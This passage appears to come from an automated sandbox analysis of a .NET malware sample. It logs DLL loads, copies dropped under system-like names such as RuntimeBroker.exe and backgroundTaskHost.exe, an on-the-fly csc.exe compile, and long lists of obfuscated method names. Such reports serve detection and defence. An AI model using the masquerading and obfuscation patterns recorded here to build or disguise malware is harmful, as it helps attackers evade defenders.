                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mswsock.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: winhttp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasadhlp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: fwpuclnt.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: winmm.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: winmmbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mmdevapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: devobj.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ksuser.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: avrt.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: audioses.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: powrprof.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: umpdc.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: msacm32.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: midimap.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: edputil.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: dwrite.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: windowscodecs.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ntmarta.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: dpapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDirectory created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDirectory created: C:\Program Files\Windows Portable Devices\eddb19405b7ce1Jump to behavior
                              Source: s5duotgoYD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: s5duotgoYD.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: s5duotgoYD.exeStatic file information: File size 1991680 > 1048576
                              Source: s5duotgoYD.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1e5c00
                              Source: s5duotgoYD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.pdb source: s5duotgoYD.exe, 00000000.00000002.1759280751.000000000382F000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: s5duotgoYD.exe, TZsYfkGWttIQxKOaTbt.cs.Net Code: Type.GetTypeFromHandle(s9EvaYRMUEYQ1w4odie.HUu17KAIOqu(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(s9EvaYRMUEYQ1w4odie.HUu17KAIOqu(16777245)),Type.GetTypeFromHandle(s9EvaYRMUEYQ1w4odie.HUu17KAIOqu(16777259))})
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeCode function: 0_2_00007FFD9B7E479C push esi; iretd 0_2_00007FFD9B7E479F
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeCode function: 0_2_00007FFD9B7E421E push cs; ret 0_2_00007FFD9B7E421F
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeCode function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
                              Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B7D479C push esi; iretd 50_2_00007FFD9B7D479F
                              Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B7D421E push cs; ret 50_2_00007FFD9B7D421F
                              Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B7D00AD pushad ; iretd 50_2_00007FFD9B7D00C1
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeCode function: 55_2_00007FFD9B7F479C push esi; iretd 55_2_00007FFD9B7F479F
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeCode function: 55_2_00007FFD9B7F421E push cs; ret 55_2_00007FFD9B7F421F
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeCode function: 55_2_00007FFD9B7F00AD pushad ; iretd 55_2_00007FFD9B7F00C1
                              Source: s5duotgoYD.exeStatic PE information: section name: .text entropy: 7.556185144032018
                              Source: backgroundTaskHost.exe.0.drStatic PE information: section name: .text entropy: 7.556185144032018
                              Source: xKVBpkhCEjg.exe.0.drStatic PE information: section name: .text entropy: 7.556185144032018
                              Source: conhost.exe.0.drStatic PE information: section name: .text entropy: 7.556185144032018
                              Source: xKVBpkhCEjg.exe0.0.drStatic PE information: section name: .text entropy: 7.556185144032018
                              Source: s5duotgoYD.exe, uPdVxnHkZ4MxBEtOBQs.csHigh entropy of concatenated method names: 'rfVHhwrlC0', 'ruMHlijuQB', 'HNsHU7j8yQ', 'nvQHMwcmMS', 'FO0HOYyYhy', 'KqpHsJpGym', 'VobHj4ND3r', 'gdcHWvrILt', 'dwWHCtpGv5', 'HYdH8QaWHQ'
                              Source: s5duotgoYD.exe, zXYkobAwGjPftBJA4sq.csHigh entropy of concatenated method names: 'KSOASqOedX', 'IZNALjjyZv', 'DOQADGJQ5o', 'BRSCUqP22rlP3VCMmKMH', 'jtqLASP20rldgDnF8v78', 'WZpiQpP2wxF0OcTPM5XF', 'Ud5pAVP2SNjBMEjgCnWn', 'Q3eEpdP2LHZOmyudKqKH', 'l13L48P2DVbAu86FjU9t'
                              Source: s5duotgoYD.exe, N8uk4YfHaebIcxVdiOR.csHigh entropy of concatenated method names: 'iODffKeJTo', 'AqIfexhNGm', 'GG1fop4djF', 'JVyfABJtqa', 'swgfZP6uIR', 'PSgHJ2P0R3vR4INqafqK', 'r6LwITP0GCYJlQMNYJTH', 'vpU9mnP052Xhn9GETEPF', 'SbQxCVP0pKvrXNTAhXmN', 'dceEkcP0zv6AlMs0iS6C'
                              Source: s5duotgoYD.exe, s9EvaYRMUEYQ1w4odie.csHigh entropy of concatenated method names: 'HUu17KAIOqu', 'Ktj176ysNlI', 'OdaiNjPR3YWk00xDwfFh', 'y7XTXBPRiwXr8Xq82mwG', 'RVX0T3PRdnISTZMqBPg6', 'dwhJbCPR0rFwcXpcESxQ'
                              Source: s5duotgoYD.exe, Kq2KLB7sfNSWOwRxiax.csHigh entropy of concatenated method names: 'He37oKCS1P', 'gFW7ASE4F8', 'AKE7ZXwYQT', 'fewRjpPh2mlnETWZXi31', 'YRgwUxPhS5rdHx9UKWZi', 'Mnrw3nPh0sZF2R2XGJxC', 'fmJknNPhwRlg6UZOIOb4', 'vIQ7HUBdHO', 'iOd7aytRxS', 'pIwReiPh3APrtmQ8OyyF'
                              Source: s5duotgoYD.exe, vMvZ0GY4HMHMKeeu0or.csHigh entropy of concatenated method names: 'N2N', 'NJJPmOF7Jet', 'aOpYgXVFjC', 'qu9Pms35OEk', 'Fo80coP3Q4GFVYry4GT6', 'Pb4v2xP3HxDef0jGseGH', 'GfJwgXP3rZAFxCOrRbRe', 'PCpQDaP3F8STMp4arN2J', 'tZuv8hP3aM9WHRy3vSR5', 'ECQAmpP3fqyQPpQmZuB0'
                              Source: s5duotgoYD.exe, KiluSymoSrR1WQgBQl6.csHigh entropy of concatenated method names: 'tpRmZcwm8O', 'igrmTtUrcT', 'HVGmhmJHi9', 'aEIm9ILnNX', 'iucmy0QQVq', 'kVomKPaTe1', 'h6BxivPK20p6KgtKSjSg', 'GtbmfSPKSZeux7Q1Kots', 'JOfPFoPKLVZjyYiCZi1I', 'Cvb2YXPKDn4vcFokaZ9t'
                              Source: s5duotgoYD.exe, vL8wv2ehx4gxpVvNNNT.csHigh entropy of concatenated method names: 'method_0', 'RyYeyhwfvC', 't8xeKQrTMs', 'PbAe6FiyZT', 'su6euLhtxc', 'v7OeBNDBbB', 'HHPe4grqTj', 'MiIES6PwoDV4vC3oN01M', 'P4Z1uhPwfZNNECQqGuCj', 'P6SWexPweBdRkl5YKm4B'
                              Source: s5duotgoYD.exe, gCPZ9cmw1UxefSBfKVj.csHigh entropy of concatenated method names: 'q6Vmc8Vflv', 'gkXKWCP6mpXwOMY59WRY', 'VguskqP6noBnJ9XXDNsM', 'Q4b4UlP6JAe7DoOjq1JP', 'ibisJ4P6Emy1NgMpMXo5', 'qPKQ0rP6kEZnuCnHaIFK', 'P9X', 'vmethod_0', 'jZbPXoD3Bgv', 'imethod_0'
                              Source: s5duotgoYD.exe, cDpTjtE1AaA7eTl1dgC.csHigh entropy of concatenated method names: 'oc5EXa6jGU', 'xf5E7jUfW9', 'daTEnAMvbE', 'ddoEJg3Ovg', 'KZlEmNxnsZ', 'kwVEEBcbbb', 'T8vEknYyDD', 'AdmEqm9f7l', 'gEcElUtjFM', 'zkjEUFWDfG'
                              Source: s5duotgoYD.exe, TFduPmEM2Xrp3WkdfNp.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'jyQU6vP69ncBi6ZdmJJn', 'MiiPPyP6yjoRrgM0KfrW', 'vUcdf3P6Ki1UniXKG8IL', 'RqafHtP66eIPl8BP8QgT'
                              Source: s5duotgoYD.exe, N6HZmqmknenS3pD458o.csHigh entropy of concatenated method names: 'XQcmlJ4Ah6', 'xhDmUVEQZq', 'AHumMsFmos', 'DyCIllPKYi2f2nqalt0e', 'Knr3UwPKroDrlvFOKWsY', 'p8oANLPKCtbYN1BYaCHU', 'AcchYsPK8kmhRtdGbpgY', 'l2vlVNPKFJ59NOsbDVsq', 'fBN6mQPKQEOeGsYXsKLM', 'RIXqNEPKHjZofVMw0u9x'
                              Source: s5duotgoYD.exe, mWauCG8AC2KJxUcUS9S.csHigh entropy of concatenated method names: 'OHp8uUQZo4', 'R1v5u7PgqRqTJmtEQRpg', 'xRqmjbPgExWOxEosSEOf', 'opQKUEPgkdVYpFLfatCk', 'A9m8TlF1m5', 'VIA8hARqc7', 'rMc89OSEy9', 'GrfDmXPg7dlJ0eThnMBH', 'OJg0RZPgnCPoWpPrHta2', 'fKEBThPgtUNTT76dpLZC'
                              Source: s5duotgoYD.exe, NBZDkqtePNe0GSR9vn5.csHigh entropy of concatenated method names: 'Mxkti7GKK7', 'YImtdqCxrs', 'wvdt0O0jKL', 'E1YOMWPZ08d2E8Y9iVGQ', 'f3Ni8cPZixAhLKJeU42T', 'xwlMqnPZdnMVjedV4JQj', 'xWQgbHPZw4CuHrQSqNpI', 'blNtAKFiUM', 'PdjtZLR3js', 'nUHtTZMwTL'
                              Source: s5duotgoYD.exe, AZZNdBmjBijG1WqISr9.csHigh entropy of concatenated method names: 'heomYORA9D', 'Rc3vn7PKy6HF0m2RuwHJ', 'HO69HNPKh2GU1bMcLBdd', 'zGUvlxPK99QuaXLf5vSo', 'AtOmCfoRj4', 'WbnvhmPKoeoRpBp4nJ6w', 'kqYYb7PKAl7oAEQJ9xuO', 'yFA6qCPKZ3IlYVE3eywR', 'T0QaLhPKfOUMCVJARLfK', 'HnQeNRPKeLnJDBPVjZah'
                              Source: s5duotgoYD.exe, q4ZfI2PxIlqHaBWMUbv.csHigh entropy of concatenated method names: 'P9X', 'nr9PcSa1vP', 'WiRPmIJ7yDv', 'imethod_0', 'WviPGBWSxb', 'dwbUeTPoV4U8en33IZDA', 'O1EnfYPoNvZy6Legq4Q2', 'gNhyuOPox1kMbOihfcRd', 'ElPAfYPocMDU1t5AG1hc', 'ngNwkEPoGdgBfQK2UjCC'
                              Source: s5duotgoYD.exe, XwaEbI7btqy3pXOQgfX.csHigh entropy of concatenated method names: 'Lk1758R4pU', 'PEg7RliR1x', 'WvT7pU6pe1', 'F2f7zY7S8O', 'mlUnI7XonR', 'BVonPdsaZp', 'eNbn1o1Pgw', 'J8Qc39P9ryKR5VRTLXSK', 'KrtQa8P9FqVuGdgaCQLQ', 'A1DM01P98ZRKGZyuGKpA'
                              Source: s5duotgoYD.exe, OtljLhYLCZEsJCEBfG5.csHigh entropy of concatenated method names: 'hJVPmj80ucQ', 'U9XYbfDb8U', 'Bt4PmW4T27n', 'j5T3InP3Kd0wbIpXgN08', 'Vh4xAtP36aJR13s4fech', 'zTMDi6P3990j5Ict1BCu', 'OaaKjhP3yOdARX2aJkqA', 'bGvawIP3uMuKS3OU6SGQ', 'xlyMcxP3BGxng7EOaB1Z'
                              Source: s5duotgoYD.exe, eDRZb9J3EwfZWDnOxsQ.csHigh entropy of concatenated method names: 'mREJcd2wKu', 'SqxJGd13H1', 'hhxYEOPKJZVQk3ZuImpr', 'npcTp0PKmnFYDtW9jFpX', 'MWAJdK47O0', 'bViJ0BVtml', 'i4hJwNmf2l', 'N7kJ25A0e0', 'SKkJSmhf8Q', 'wwkJLAt9X3'
                              Source: s5duotgoYD.exe, RAmGmNKDLuMUDTIkN0r.csHigh entropy of concatenated method names: 'wswhXPPNsWOwmeRYxUmD', 'CFgRX7PNMk276FRY4Q5s', 'QGHAPQPNOlY5liocybXv', 'HZYCLMPNjXfL42U4oeFg', 'unEKN5vpxF', 'Mh9', 'method_0', 'VRdKxQP0m8', 'Ny9KV7BVCS', 'pOTKceBN46'
                              Source: s5duotgoYD.exe, Ca2mNBZUOpkuY8nui3s.csHigh entropy of concatenated method names: 'GbHZOgDuNW', 'kE00UFPSW2dhKFQAvW4I', 'glc87RPSsuU7tbefskt2', 'an1kbLPSjG4VK0YZKW6c', 'xIbiKZPSC9FWoPnUDE7R', 'KwceC7PS8POEH2nD1Cqs', 'zIGZYePSYUw2EJCOgHUq', 'P335jvPSrHew6qxDoTBD'
                              Source: s5duotgoYD.exe, p6gytP7dFUijZ5TZafK.csHigh entropy of concatenated method names: 'qyq7LeODxL', 'ysVEKoP9ldnITPpkNIT3', 'niVi8SP9kVOBf1bF7Kt1', 'jQ6ZtvP9qrfnFc1uXMPI', 'U1J', 'P9X', 'YTnPXs4Er43', 'fDFPXjGbR8a', 'PC6PmJreA5P', 'imethod_0'
                              Source: s5duotgoYD.exe, UkcZR47vgsST4B3eCrR.csHigh entropy of concatenated method names: 'q64', 'P9X', 'CS1PXMVI4LF', 'vmethod_0', 'lcsPmnT6JmB', 'imethod_0', 'GQeRIUPhRDwi0ygTOQ5n', 'a2JNT9Php0wFBeRsb5wQ', 'M1Kfq8PhzxI6OHEFoSB4', 'VABgnPP9ISeUsqaQZd1j'
                              Source: s5duotgoYD.exe, Qk2yf01hVSdFrZGJsoI.csHigh entropy of concatenated method names: 'A5N13LPswl', 'ggu1i48l1F', 'e2WZmhPAgGAgsCMKgTTY', 'Pbv96VPA4hVjSGAwd8kX', 'khWUyaPAv7uG4hOlHdUh', 'cX34eWPA3UeZiSkpdXZ4', 'a2f12nLg5w', 'VIdpWTPAwm3xFAlyYUGa', 'qPRXmYPA2Ek2s5G2afST', 'nGdmDxPAdLb4oS6U9mNl'
                              Source: s5duotgoYD.exe, EZhHHVhm8wFuZ0T5ClN.csHigh entropy of concatenated method names: 'Udnhkt3bcY', 'fBOhq6cESL', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'cVlhlZMccg', 'method_2', 'uc7'
                              Source: s5duotgoYD.exe, M6YHIfJ8NvXk2QDHmjd.csHigh entropy of concatenated method names: 'A5DJAujZrV', 'k23XekPywxXVaxrcTdcU', 'm09GpKPy2WIm6EEmAdQY', 'pcrH9PPydVFlpTkiP8wp', 'bTqDymPy00hejnSo1ft8', 'AvsbaVPySwNYI2R4CvhG', 'nmkJr8vr2N', 'gfHJFEbJud', 'agPJQTCZqF', 'MHnJH2kyor'
                              Source: s5duotgoYD.exe, qVTmMNRCLM6lJvKQjTh.csHigh entropy of concatenated method names: 'kA3RZSFTAX', 'dvYRT9ejqU', 'mmlRh8nrBE', 'kGYR9eqcu4', 'O4cRy9dLwM', 'sTMRK114tC', 'M24R6VhKAo', 'GH5RuGSG46', 'Cu6RBIxGeU', 'QijR4oMMtf'
                              Source: s5duotgoYD.exe, GqpIryot60cqp5qeGq7.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'dMmo7LmjJs', 'Write', 'mEBonubAYV', 'uOToJp93El', 'Flush', 'vl7'
                              Source: s5duotgoYD.exe, OB9pWyAplHEPqAIDlhn.csHigh entropy of concatenated method names: 'F88ZIy7Avt', 'ck7ZP0PlcC', 'INQZ1JVZKI', 'ElWZtbBO4W', 'aP2ZXjLBfM', 'tK8Z7bobsi', 'RfNsNtPSPMX4FM63Drvv', 'x6IRJRP2zLOnpVKfwl9n', 'HtyQbYPSI1bdDNAYTwES', 'eJydcdPS11RKKTane5hn'
                              Source: s5duotgoYD.exe, zsCc8F8xJNG8gWnHYmU.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'H4XPmUiv7PH', 'HlNPXwOE9Xv', 'CExflCPgAIQKOmR7hRfT', 'xj4TD3PgZO7VNtgP1ZPn', 'RUQpuAPgTrrkAu4cdvAg', 'MpQkeIPghe2soV6NGSre', 'bZqXSLPg9inkaR4pmuiY'
                              Source: s5duotgoYD.exe, IVtfySHbEVkbFgptUws.csHigh entropy of concatenated method names: 'zJCHxklZki', 'Ru2HVM167J', 'THLHcAjcwf', 'dTlHGBfGyN', 'cVpH50Rwc8', 'wXTUCUPd5wTTZmQxgoen', 'cGHa1nPdRBF0xD9HxSVV', 'tiryB0PdpY06GFITjtbW', 'n5TZo2PdzJNP7jtHXCbx', 'CqpnH5P0Io7WHeFqVP5b'
                              Source: s5duotgoYD.exe, QkyRi4Jh5TipiH7c5M6.csHigh entropy of concatenated method names: 'TUtJy5cEj2', 'kkNJKGxY5j', 'UhI6ydPyDlkD8RKYfkFN', 'A0bD9LPybIipj239aMsg', 'FieBY3PyNtYqJtBeJHPR', 's5HR4fPyxtYUwldIuexC', 'GbGHA2PyVWqoW1gD0fJ4', 'SloIaMPyc7JoSlK7vNlm', 'xJV2umPyGUPgQFRlkflt'
                              Source: s5duotgoYD.exe, yB3xSYvhQIPyqtGwH4l.csHigh entropy of concatenated method names: 'LEuvy0ZEgJ', 'wTOvKKUUlU', 'wU7v6yr4gn', 'MX9vugxxZv', 'xgGvBqCvb5', 'Ig7v40yhMf', 'HSYvvS76Tw', 'Mhjvg7oJaP', 'cj3v3SorgB', 'kxjvi1YRYI'
                              Source: s5duotgoYD.exe, AfhqaX404ws9vKF5SK9.csHigh entropy of concatenated method names: 'Rq9Pmaq1eVA', 'y9742MroJr', 'CEr4S1pEQK', 'ch94LDX0mN', 'RuvE2qPx42cblA8hBnoD', 'S6mwHXPxv36E83yvyH4r', 'bKIwNGPxg6Yl49Bgedtp', 'QYaDe9Px3RMnYbN56Lsc', 'jcZSvEPxiRCm76CJtNyr', 'CV3P8yPxdEDpR1vVjR1y'
                              Source: s5duotgoYD.exe, TZsYfkGWttIQxKOaTbt.csHigh entropy of concatenated method names: 'YaQWRcPRUqqcgIlQCbga', 'trNB6XPRMEGyVaTfTyfv', 'giE5xsVWZG', 'PDDC6aPRWqvr1kH9jIm7', 'LybYuEPRCN55ZuslkR0D', 'Y6turiPR8FHMEfUfC9Wq', 'ED8JA3PRYMZC5af9Bfcb', 'SGCO17PRrQr6D4OFLT8L', 'sYGTbZPRFGvVspZrOT0s', 'xwSKbwPRQEljcM3CdSCl'
                              Source: s5duotgoYD.exe, Lltnq6ZghG5c2fpaSXD.csHigh entropy of concatenated method names: 'n2DZitY2eM', 'fRYZdtYYPY', 'jFpZ0t2ChL', 'it5ZwDeFa4', 'VwDZ2DJmFl', 'uprZSQlgT4', 'wobZLss1Dv', 'fMbZD7fQX2', 'MAIZbpmeRm', 'JdHZNvQ5ZK'
                              Source: s5duotgoYD.exe, KXuf0qXfvRGGkBqPCEE.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'deHPmt7nkTq', 'xV8PXPa3M1k', 'PJPoe4PTTVwJoxxKw97s', 'vWEctaPThe291ORhdoNe', 'fyceh4PT9jhF9VSkV5iC'
                              Source: s5duotgoYD.exe, pqo1iHcU24LAUwkygda.csHigh entropy of concatenated method names: 'mU3csJnTUA', 'Jttc8FYIv6', 'dbkcFKKRxM', 'YQEcQoNpcs', 'UrXcHXulHI', 'QvjcayWMeZ', 'ndgcfefXEO', 'iSacekwt4H', 'Dispose', 'Sli9FIP5rSxN1hjGQnrq'
                              Source: s5duotgoYD.exe, qCe5QY9r2lT1v09Uw30.csHigh entropy of concatenated method names: 'vDRyMhmMpG', 'I2frfcPDpDBZ7yaTox37', 'jAdQViPD5kCX0yonIsbq', 'wEa8cOPDRUZCceql10VJ', 'l47actPDzZhb4nQjbmsH', 'kt5', 'maA9Q3SGj9', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                              Source: s5duotgoYD.exe, hNilsnyDDVe9h70UK0g.csHigh entropy of concatenated method names: 'c0CyNouowJ', 'k6r', 'ueK', 'QH3', 'Bskyx5JVTw', 'Flush', 'jCVyVuaWoV', 'VeBycQNNJs', 'Write', 'zMIyGgda0B'
                              Source: s5duotgoYD.exe, VmDBNDFUXNORWVZRA06.csHigh entropy of concatenated method names: 'claHPGslaI', 'y7dXh8PdhiQV1R3KdwB2', 'sJHogfPd9mY55qpEqQPh', 'jfnFOITJHc', 'gWcFsSABPm', 'SQDFjInhgZ', 'IRIFWDcXOH', 'UrKFCqvrK3', 'Eb3F8dX1La', 'IM9FYYJ3Rj'
                              Source: s5duotgoYD.exe, GDqUoe17Nx4r8tt1DEC.csHigh entropy of concatenated method names: 'ITg1J7T2Ud', 'xGU1mKniK2', 'dxF1Exv52U', 'HZc1kk8M14', 'qBSvLlPAOb8W39souJy7', 'CU8o6uPAUyjuiqBBM6OZ', 's4FIhFPAMq8oIV5ob5Le', 'h6ovUyPAsh6uwAPUZPVR', 'IDF7NJPAjl4ejk1SlmcH', 'DSaixnPAWFKnQMTLKlr9'
                              Source: s5duotgoYD.exe, nLSj9KPpNupjhxo9dHa.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'FiRPmPMY1da', 'xV8PXPa3M1k', 'HjLOC9PozX41osexbGIy', 'TUjNT7PAIN9e3CLTrneC', 'RGB5CyPAPLOFBpstywiL', 'd26fcHPA1w2F9FrddvWN'
                              Source: s5duotgoYD.exe, LnJ5mWPCsd5kQecAB7b.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'jxHPJzNoMN9', 'xV8PXPa3M1k', 'oOrZh5PoCUtF6TFi04Xq', 'JdNDYLPo8VaEmNjeuXem'
                              Source: s5duotgoYD.exe, u01Acm1DbqgXs4JLdER.csHigh entropy of concatenated method names: 'jOptJMUZ9V', 'zSBbSfPZ1VoxdKI3E194', 'NABHs0PZty57QSGGASMQ', 'hRRS8cPZI33LnixB6ixj', 'qOftaXPZPbkNL9FUiIMP', 'nTcQMvPZXB0SkhrJsIkX', 'u20tIRqs3D', 'cfOt1ddTC4', 'tjItt8K1oq', 'EgAtXGtOxJ'
                              Source: s5duotgoYD.exe, qLYVSCnK1dforyDENeG.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'QcbPmkE6QyL', 'xV8PXPa3M1k', 'qWfdasP9SwpU3wLhFqNf', 'UHROIPP9L2wWZcZOBXlW', 'JkiJ8bP9D2GdxtHMH6Jt'
                              Source: s5duotgoYD.exe, nskxpqGIpu14wH8vHHs.csHigh entropy of concatenated method names: 'tpwGXGGe8n', 'vl4G7bh86K', 'CN8fCsP5xC50R77H5Lif', 'mYiUBDP5V8RiwVHuZBw0', 'hf3rkOP5c412SJo6xL8n', 'W8iCiVP5GxSrOotkhtXt', 'nWvyv4P55uicmK2UM1mE', 'DQ9G1Jvanb', 'Y54pekP5DqVdrAoEZZcY', 'gTYsjFP5bagSvO6sX2ye'
                              Source: s5duotgoYD.exe, snjLIOZmNWI4BnMR43c.csHigh entropy of concatenated method names: 'JraZkCUmEj', 'YmLZqkD4Ir', 'JFIZlG70wa', 'TU1kmFPSqlJCCwJNbi8x', 'RPkvm2PSE2DnFoQxMF3F', 'BkMOuFPSktjDiRvR5Dqj', 'BCIBRKPSl3TwR1nJ4LD2', 'Blv9pdPSU07BSmIxoeW4', 'X04FVyPSMe1Wy1cMq1ys'
                              Source: s5duotgoYD.exe, GlllPI4EMTX3cxUOQ4u.csHigh entropy of concatenated method names: 'Vtp4affBKu', 'NcvbnMPxaBQvIb7ZDf9e', 'jG1twKPxfI2XwJsBJppT', 'vK3TQBPxQ7Xjrcbkth46', 'wRMciHPxHMUfjLmpYdqb', 'K7Ee9bPxeNLUy3xe2TON', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: s5duotgoYD.exe, YoQJCwW6qXA3YfWwbL.csHigh entropy of concatenated method names: 'j0vKXaPqv', 'OmLs3KPeoff4JQageOhE', 'HfnbeqPeAFnLtpF1TJY1', 'x4HkRqPef8cbDyIjjiTw', 'GfEJY8PeeBVyd2Ex5rmM', 'ErW8iiuKE', 'R9CYyhXWL', 'l2PrFlhQk', 'vwdFLp7sF', 'xvoQ0ax9V'
                              Source: s5duotgoYD.exe, sYPnssg6Fw8JojMMYdg.csHigh entropy of concatenated method names: 'f7JI7uPcIuX5TOBKTAAN', 'OWGUU8PVpqMqmxo2e48P', 'hypgCFPVzAUC8Ist2tQk', 'CwhSp0PVcg1fAUMC2Ysw', 'KNO43yPVGLhIWxj0d68T', 'xUEjKYPV5iO6sbMEem5g', 'TCKilPPVxi0LGpxScMH3', 'eqHjpfPVV67vLiuQtcCk'
                              Source: s5duotgoYD.exe, V0ZGrmadkgSHBVxs2K4.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'SW0awE1TeV', 'CVja2saZap', 'Dispose', 'D31', 'wNK'
                              Source: s5duotgoYD.exe, IVkKrhRv2NN7Ydpa3nB.csHigh entropy of concatenated method names: 'GrNPn9fEBjr', 'l99PnyKCKyb', 'YpQPnKJY7so', 'bd4Pn6jxCbk', 'FDpPnucdOrn', 'e9PPnB6kJia', 'dpDPn4GO3x9', 'FtDp7xentB', 'CckPnvxPXEo', 'fVaPng6fV24'
                              Source: s5duotgoYD.exe, dkt3jGxBnssbg9EotF0.csHigh entropy of concatenated method names: 'TaKPmeenMup', 'fixPnf2Vylc', 'JdHqm5PG8TbXkTpe98xV', 'SyZjpaPGWjrArrEeg62b', 'M5oAJUPGCxodeDC2Cuqw', 'LUBYF6PGYuNRdEMEVbHC', 'fIFffFPGHLGfR2KWXZVF', 'Nu52dlPGFrXBlCKa5vyK', 'AHT2EVPGQX0rrnK5rDvO', 'J37e8XPGaQ9I4QrQXPaw'
                              Source: s5duotgoYD.exe, PbJLkrYMYZDgCnlBh3C.csHigh entropy of concatenated method names: 'wy0YYoUv8L', 'dlj78JP31g4V3M4UJNWr', 'fgakiLP3IeWb9gd6qfHh', 'TdbqQ4P3PUQLRgOu6hSE', 'hp0wdmP3tYXpDjmjuw8w', 'oO2YsmI9re', 'MPCgVgPgGw31V8wTeQc0', 'aX2MewPgVv8R2Mv6PBtt', 'pJiq9VPgc4EuIQmk8rLY', 'hj6RJNPg5cdNWyshwvDL'
